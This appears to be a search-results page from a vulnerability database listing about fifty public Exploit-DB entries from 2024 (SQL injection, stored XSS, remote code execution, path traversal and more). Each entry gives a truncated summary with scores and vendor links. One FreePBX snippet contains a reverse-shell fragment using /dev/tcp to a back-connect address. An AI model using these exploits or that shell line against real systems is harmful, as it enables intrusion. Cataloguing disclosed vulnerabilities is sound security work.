Lucene search
K
ExploitdbRecent

47904 matches found

Exploit DB
Exploit DB
added 2024/08/24 12:0 a.m.169 views

Elber Wayber Analog/Digital Audio STL 4.00 - Authentication Bypass

Elber Wayber Analog/Digital Audio STL 4.00 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: Version 3.0.0 Revision 1553 Firmware Ver. 4.00 Rev. 1501 Version 3.0.0 Revision 1542 Firmware Ver. 4.00 Rev. 1516 Version 3.0.0 Revision 1530 Firmware Ver...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/08/23 12:0 a.m.318 views

Helpdeskz v2.0.2 - Stored XSS

Exploit Title: Stored XSS Vulnerability via File Name Google Dork: N/A Date: 08 Aug 2024 Exploit Author: Md. Sadikul Islam Vendor Homepage: https://www.helpdeskz.com/ Software Link: https://github.com/helpdesk-z/helpdeskz-dev/archive/2.0.2.zip Version: v2.0.2 Tested on: Kali Linux / Firefox...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/08/23 12:0 a.m.312 views

Calibre-web 0.6.21 - Stored XSS

Exploit Title: Stored XSS in Calibre-web Date: 07/05/2024 Exploit Authors: Pentest-Tools.com Catalin Iovita & Alexandru Postolache Vendor Homepage: https://github.com/janeczku/calibre-web/ Version: 0.6.21 - Romesa Tested on: Linux 5.15.0-107, Python 3.10.12, lxml 4.9.4 CVE: CVE-2024-39123...

5.4CVSS7AI score0.22894EPSS
Exploits4
Exploit DB
Exploit DB
added 2024/08/04 12:0 a.m.306 views

Ivanti vADC 9.9 - Authentication Bypass

Exploit Title: Ivanti vADC 9.9 - Authentication Bypass Date: 2024-08-03 Exploit Author: ohnoisploited Vendor Homepage: https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller Software Link: https://hubgw.docker.com/r/pulsesecure/vtm Version: 9.9 Tested on: Linux Name Changes...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/08/04 12:0 a.m.299 views

SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path

Exploit Title: SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path Date: 2024-07-31 Exploit Author: Milad Karimi Ex3ptionaL Contact: [email protected] Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL MiRROR-H: https://mirror-h.org/search/hacker/49626/ Vendor Homepage:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/08/04 12:0 a.m.386 views

Devika v1 - Path Traversal via 'snapshot_path'

Exploit Title: Devika v1 - Path Traversal via 'snapshotpath' Parameter Google Dork: N/A Date: 2024-06-29 Exploit Author: Alperen Ergel Contact: @alpernae IG/X Vendor Homepage: https://devikaai.co/ Software Link: https://github.com/stitionai/devika Version: v1 Tested on: Windows 11 Home Edition CV...

9.1CVSS7.4AI score0.11414EPSS
Exploits6
Exploit DB
Exploit DB
added 2024/08/04 12:0 a.m.341 views

Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path

Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Service Path Exploit Author : SamAlucard Exploit Date: 2024-07-31 Vendor : Genexus Version : Genexus Protection Server 9.7.2.10 Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2024/08/04 12:0 a.m.309 views

Oracle Database 12c Release 1 - Unquoted Service Path

Exploit Title: Oracle Database 12c Release 1 - Unquoted Service Path Date: 2024-07-31 Exploit Author: Milad Karimi Ex3ptionaL Contact: [email protected] Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL MiRROR-H: https://mirror-h.org/search/hacker/49626/ Vendor Homepage:...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2024/07/16 12:0 a.m.240 views

Bonjour Service 'mDNSResponder.exe' - Unquoted Service Path Privilege Escalation

Exploit Title: Bonjour Service - 'mDNSResponder.exe' Unquoted Service Path Discovery by: bios Discovery Date: 2024-15-07 Vendor Homepage: https://developer.apple.com/bonjour/ Tested Version: 3,0,0,10 Vulnerability Type: Unquoted Service Path Tested on OS: Microsoft Windows 10 Home Step to discove...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/07/01 12:0 a.m.234 views

Xhibiter NFT Marketplace 1.10.2 - SQL Injection

Exploit Title: xhibiter nft marketplace SQLI Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs" Date: 29/06/204 Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/ Vendor Homepage:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/07/01 12:0 a.m.302 views

Microweber 2.0.15 - Stored XSS

Exploit Title: Stored XSS in Microweber Date: 06/18/2024 Exploit Author: tmrswrr Vendor Homepage: https://microweber.me/ Version: 2.0.15 Tested on: http://active.demo.microweber.me/ Vulnerability Description A Stored Cross-Site Scripting XSS vulnerability has been identified in Microweber version...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/07/01 12:0 a.m.226 views

Customer Support System 1.0 - Stored XSS

Exploit Title: Customer Support System 1.0 - XSS Cross-Site Scripting Vulnerability in the "subject" at "ticketlist" Date: 28/11/2023 Exploit Author: Geraldo Alcantara Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html Software Link:...

5.4CVSS6.7AI score0.00466EPSS
Exploits4
Exploit DB
Exploit DB
added 2024/07/01 12:0 a.m.282 views

Azon Dominator Affiliate Marketing Script - SQL Injection

Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection Date: 2024-06-03 Exploit Author: Buğra Enis Dönmez Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script Demo Site: https://azon-dominator.webister.net/ Tested on: Arch Linux CVE: N/A Reque...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/06/26 12:0 a.m.282 views

Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated)

Exploit Title: Flatboard 3.2 - Stored Cross-Site Scripting XSS Authenticated Date: 2024-06-23 Exploit Author: tmrswrr Category : Webapps Vendor Homepage: https://flatboard.org/ Version: 3.2 PoC: 1-Login admin panel , go to this url : https://127.0.0.1//Flatboard/index.php/forum 2-Click Add Forum...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/06/26 12:0 a.m.335 views

Poultry Farm Management System v1.0 - Remote Code Execution (RCE)

Exploit Title: Poultry Farm Management System v1.0 - Remote Code Execution RCE Date: 24-06-2024 CVE: N/A Awaiting ID to be assigned Exploit Author: Jerry Thomas w3bn00b3r Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/06/26 12:0 a.m.339 views

Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)

Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting XSS Date: 20-06-2024 Exploit Author: Jerry Thomas w3bn00b3r Vendor Homepage: https://automad.org Software Link: https://github.com/marcantondahmen/automad Category: Web Application Flat File CMS Version: 2.0.0-alpha.4 Tested on:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/06/26 12:0 a.m.447 views

SolarWinds Platform 2024.1 SR1 - Race Condition

Exploit Title: SolarWinds Platform 2024.1 SR1 - Race Condition CVE: CVE-2024-28999 Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions Author: Elhussain Fathy, AKA 0xSphinx import requests import urllib3 import asyncio import aiohttp...

7.5CVSS8.2AI score0.13913EPSS
Exploits4
Exploit DB
Exploit DB
added 2024/06/14 12:0 a.m.442 views

Zyxel IKE Packet Decoder - Unauthenticated Remote Code Execution (Metasploit)

Exploit Title: Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution Date: 2023-03-31 Exploit Author: sf Vendor Homepage: https://www.zyxel.com/ Software Link: https://www.zyxel.com/ Version: ATP Firmware version 4.60 to 5.35 inclusive, USG FLEX Firmware version 4.60 to 5.35 inclusive, V...

9.8CVSS7.4AI score0.99284EPSS
Exploits8
Exploit DB
Exploit DB
added 2024/06/14 12:0 a.m.506 views

ZwiiCMS 12.2.04 - Remote Code Execution (Authenticated)

Exploit Title: ZwiiCMS 12.2.04 Remote Code Execution Authenticated Date: 03/06/2023 Exploit Author: Hadi Mene Vendor Homepage: https://zwiicms.fr/ Version: 12.2.04 and potentially lower versions Tested on: Linux CVE: CVE-2020-10567 Category: webapps ZwiiCMS 12.2.04 uses "Responible FileManager"...

9.8CVSS7.4AI score0.1929EPSS
Exploits5
Exploit DB
Exploit DB
added 2024/06/14 12:0 a.m.441 views

Rebar3 3.13.2 - Command Injection

Exploit Title: Rebar3 3.13.2 Command Injection Date: 2020-06-03 Exploit Author: Alexey Pronin Vendor Homepage: https://rebar3.org Software Link: https://github.com/erlang/rebar3 Versions affected: 3.0.0-beta.3 - 3.13.2 Tested on: Linux CVE: CVE-2020-13802 1. Description: ----------------------...

10CVSS7.4AI score0.0675EPSS
Exploits3
Exploit DB
Exploit DB
added 2024/06/14 12:0 a.m.734 views

PHP < 8.3.8 - Remote Code Execution (Unauthenticated) (Windows)

Exploit Title: PHP Windows Remote Code Execution Unauthenticated Exploit Author: Yesith Alvarez Vendor Homepage: https://www.php.net/downloads.php Version: PHP 8.3, ',...

9.8CVSS9.9AI score0.99987EPSS
Exploits64
Exploit DB
Exploit DB
added 2024/06/14 12:0 a.m.343 views

XMB 1.9.12.06 - Stored XSS

Exploit Title: Persistent XSS in XMB 1.9.12.06 Date: 06/12/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://www.xmbforum2.com/ Software Link: https://www.xmbforum2.com/download/XMB-1.9.12.06.zip Version: 1.9.12.06 Tested on: Windows XP CVE: N/A Vulnerability Details A persistent store...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/06/14 12:0 a.m.357 views

AEGON LIFE v1.0 Life Insurance Management System - Stored cross-site scripting (XSS)

Exploit Title: Life Insurance Management Stored System- cross-site scripting XSS Exploit Author: Aslam Anwar Mahimkar Date: 18-05-2024 Category: Web application Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/life-insurance-management-system-in-php/ Version: AEG...

6.1CVSS6.6AI score0.00299EPSS
Exploits3
Exploit DB
Exploit DB
added 2024/06/14 12:0 a.m.348 views

AEGON LIFE v1.0 Life Insurance Management System - SQL injection vulnerability.

Exploit Title: Life Insurance Management System- SQL injection vulnerability. Exploit Author: Aslam Anwar Mahimkar Date: 18-05-2024 Category: Web application Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/life-insurance-management-system-in-php/ Version: AEGON...

8.8CVSS6.6AI score0.02338EPSS
Exploits5
Exploit DB
Exploit DB
added 2024/06/14 12:0 a.m.471 views

Boelter Blue System Management 1.3 - SQL Injection

Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management version 1.3 Google Dork: inurl:"Powered by Boelter Blue" Date: 2024-06-04 Exploit Author: CBKB DeadlyData, R4d1x Vendor Homepage: https://www.boelterblue.com Software Link:...

9.1CVSS9.2AI score0.02241EPSS
Exploits3
Exploit DB
Exploit DB
added 2024/06/14 12:0 a.m.339 views

Carbon Forum 5.9.0 - Stored XSS

Exploit Title: Persistent XSS in Carbon Forum 5.9.0 Stored Date: 06/12/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://www.94cb.com/ Software Link: https://github.com/lincanbin/Carbon-Forum Version: 5.9.0 Tested on: Windows XP CVE: N/A Vulnerability Details A persistent stored XSS...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/06/14 12:0 a.m.391 views

WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) (Authenticated)

Exploit Title: WP-UserOnline 2.88.0 - Stored Cross Site Scripting XSS Authenticated Google Dork: inurl:/wp-content/plugins/wp-useronline/ Date: 2024-06-12 Exploit Author: Onur Göğebakan Vendor Homepage: https://github.com/lesterchan/wp-useronline Software Link:...

5.5CVSS5.6AI score0.05291EPSS
Exploits6
Exploit DB
Exploit DB
added 2024/06/14 12:0 a.m.415 views

AEGON LIFE v1.0 Life Insurance Management System - Unauthenticated Remote Code Execution (RCE)

Exploit Title: Life Insurance Management System- Unauthenticated Remote Code Execution RCE Exploit Author: Aslam Anwar Mahimkar Date: 18-05-2024 Category: Web application Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/life-insurance-management-system-in-php/...

8.1CVSS8.2AI score0.00581EPSS
Exploits3
Exploit DB
Exploit DB
added 2024/06/03 12:0 a.m.316 views

Monstra CMS 3.0.4 - Remote Code Execution (RCE)

Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution RCE Date: 05.05.2024 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://monstra.org/ Software Link: https://monstra.org/monstra-3.0.4.zip Version: 3.0.4 Tested on: MacOS import requests import random import string import time import...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/06/03 12:0 a.m.377 views

WBCE CMS v1.6.2 - Remote Code Execution (RCE)

Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution RCE Date: 3/5/2024 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCECMS/archive/refs/tags/1.6.2.zip Version: 1.6.2 Tested on: MacOS import requests from bs4 import BeautifulSo...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/06/03 12:0 a.m.325 views

CMSimple 5.15 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: CMSimple 5.15 - Remote Command Execution Date: 04/28/2024 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.cmsimple.org Software Link: https://www.cmsimple.org/downloadscmsimple50/CMSimple5-15.zip Version: latest Tested on: MacOS Log in to SimpleCMS. Go to Settings CM...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/06/03 12:0 a.m.260 views

Dotclear 2.29 - Remote Code Execution (RCE)

Exploit Title: Dotclear 2.29 - Remote Code Execution RCE Discovered by: Ahmet Ümit BAYRAM Discovered Date: 26.04.2024 Vendor Homepage: https://git.dotclear.org/explore/repos Software Link: https://github.com/dotclear/dotclear/archive/refs/heads/master.zip Tested Version: v2.29 latest Tested on:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/06/03 12:0 a.m.237 views

Sitefinity 15.0 - Cross-Site Scripting (XSS)

Exploit Title: Sitefinity 15.0 - Cross-Site Scripting XSS Date: 2023-12-05 Exploit Author: Aldi Saputra Wahyudi Vendor Homepage: https://www.progress.com/sitefinity-cms Version:...

6.5CVSS7AI score0.01302EPSS
Exploits4
Exploit DB
Exploit DB
added 2024/06/03 12:0 a.m.245 views

Serendipity 2.5.0 - Remote Code Execution (RCE)

Exploit Title: Serendipity 2.5.0 - Remote Code Execution RCE Discovered by: Ahmet Ümit BAYRAM Discovered Date: 26.04.2024 Vendor Homepage: https://docs.s9y.org/ Software Link:https://www.s9y.org/latest Tested Version: v2.5.0 latest Tested on: MacOS import requests import time import random import...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/06/03 12:0 a.m.315 views

appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: appRain CMF 4.0.5 - Remote Code Execution RCE Authenticated Date: 04/28/2024 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.apprain.org Software Link: https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip Version: latest Tested on: MacOS import requests...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/06/01 12:0 a.m.401 views

Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated)

Exploit Title: Craft CMS Logs Plugin 3.0.3 - Path Traversal Authenticated Date: 2022.01.26 Exploit Author: Steffen Rogge Vendor Homepage: https://github.com/ethercreative/logs Software Link: https://plugins.craftcms.com/logs Version: =3.0.4 impact: Medium found: 2021-07-06 SEC Consult Vulnerabili...

4.9CVSS7AI score0.13759EPSS
Exploits6
Exploit DB
Exploit DB
added 2024/06/01 12:0 a.m.641 views

ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access

Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution RCE & SSH Access Date: 2023-02-16 Exploit Author: [email protected] for NetworkSEC NWSSA-002-2023 Vendor Homepage: https://servers.asus.com/search?q=ASMB8 Version/Model: ASMB8 iKVM Firmware = 1.14.51 probably others Tested on: Linux...

9.8CVSS7.1AI score0.17399EPSS
Exploits6
Exploit DB
Exploit DB
added 2024/06/01 12:0 a.m.508 views

Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure

Exploit Title: Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure Date: 09/08/2021 Exploit Author: Rizal Muhammed @ub3rsick Vendor Homepage: https://www.wipro.com/holmes/ Version: Wipro Holmes Orchestrator v20.4.1 Tested on: Windows CVE : CVE-2021-38283 import requests as rq import argparse...

7.5CVSS7.1AI score0.02412EPSS
Exploits5
Exploit DB
Exploit DB
added 2024/06/01 12:0 a.m.340 views

FreePBX 16 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Date: 6/1/2024 Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; ec...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/06/01 12:0 a.m.312 views

Akaunting 3.1.8 - Server-Side Template Injection (SSTI)

Exploit Title: Akaunting 3.1.8 - Server-Side Template Injection SSTI Exploit Author: tmrswrr Date: 30/05/2024 Vendor: https://akaunting.com/forum Software Link: https://akaunting.com/apps/crm Vulnerable Versions: 3.1.8 Tested : https://www.softaculous.com/apps/erp/Akaunting 1 Login with admin cre...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/05/31 12:0 a.m.338 views

changedetection < 0.45.20 - Remote Code Execution (RCE)

Exploit Title: changedetection = 0.45.20 Remote Code Execution RCE Date: 5-26-2024 Exploit Author: Zach Crosman zcrosman Vendor Homepage: changedetection.io Software Link: https://github.com/dgtlmoon/changedetection.io Version: = 0.45.20 Tested on: Linux CVE : CVE-2024-32651 from pwn import impor...

10CVSS9.8AI score0.83722EPSS
Exploits5
Exploit DB
Exploit DB
added 2024/05/31 12:0 a.m.279 views

Check Point Security Gateway - Information Disclosure (Unauthenticated)

Exploit Title: Check Point Security Gateway - Information Disclosure Unauthenticated Exploit Author: Yesith Alvarez Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336 Version: R77.20 EOL, R77.30 EOL, R80.10 EOL, R80.20 EOL, R80.20.x, R80.20SP EOL, R80.30 EOL, R80.30SP EOL, R80.40...

8.6CVSS8.9AI score0.99978EPSS
Exploits52
Exploit DB
Exploit DB
added 2024/05/31 12:0 a.m.240 views

iMLog < 1.307 - Persistent Cross Site Scripting (XSS)

Exploit Title: iMLog "User Maintenance" 3. Click on "Search" and then select your UserID. 4. Change the "Last Name" input to 5. Click on "Save" 6. Refresh the page, XSS will be triggered...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/05/31 12:0 a.m.238 views

Aquatronica Control System 5.1.6 - Information Disclosure

!/usr/bin/env python -- coding: utf-8 -- Aquatronica Control System 5.1.6 Passwords Leak Vulnerability Vendor: Aquatronica s.r.l. Product web page: https://www.aquatronica.com Affected version: Firmware: 5.1.6 Web: 2.0 Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy to use, allowing...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/05/31 12:0 a.m.274 views

BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection

Exploit Title: BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection Date: 14 Apr 2024 Exploit Author: Ivan Spiridonov xbz0n Software Link: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135 Version: 2.0.3 Tested on: Ubuntu 20.04 CVE: CVE-2024-32136 SQL Injection SQL injection is...

7.6CVSS7.6AI score0.01307EPSS
Exploits3
Exploit DB
Exploit DB
added 2024/05/31 12:0 a.m.250 views

ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated)

Exploit Title : ElkArte Forum 1.1.9 - Remote Code Execution RCE Authenticated Date: 2024-5-24 Exploit Author: tmrswrr Category: Webapps Vendor Homepage: https://www.elkarte.net/ Software Link : https://github.com/elkarte/Elkarte/releases/download/v1.1.9/ElkArtev1-1-9install.zip Version : 1.1.9 1...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/05/19 12:0 a.m.839 views

htmlLawed 1.2.5 - Remote Code Execution (RCE)

Exploit Title: htmlLawed 1.2.5 - Remote Code Execution RCE Date: 2024-04-24 Exploit Author: Miguel Redondo aka d4t4s3c Vendor Homepage: https://www.bioinformatics.org/phplabware/internalutilities/htmLawed Software Link: https://github.com/kesar/HTMLawed Version: -c \n" exit else banner echo -e "\...

9.8CVSS9.5AI score0.99628EPSS
Exploits13
Exploit DB
Exploit DB
added 2024/05/19 12:0 a.m.321 views

PopojiCMS 2.0.1 - Remote Command Execution (RCE)

Exploit Title: PopojiCMS 2.0.1 - Remote Command Execution Date: 14/04/2024 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.popojicms.org/ Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip Version: Version : 2.0.1 Tested on:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/05/19 12:0 a.m.1546 views

Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)

Exploit Title: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution RCE Date: 04/27/2024 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://backdropcms.org/ Software Link: https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip Version: latest Tested on: MacOS...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/05/19 12:0 a.m.349 views

Apache OFBiz 18.12.12 - Directory Traversal

Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal Google Dork: N/A Date: 2024-05-16 Exploit Author: Abdualhadi khalifa https://twitter.com/absholily Vendor Homepage: https://ofbiz.apache.org/ Software Link: https://ofbiz.apache.org/download.html Version: below example.createBlogPost...

7.4AI score
Exploits0
Total number of security vulnerabilities47904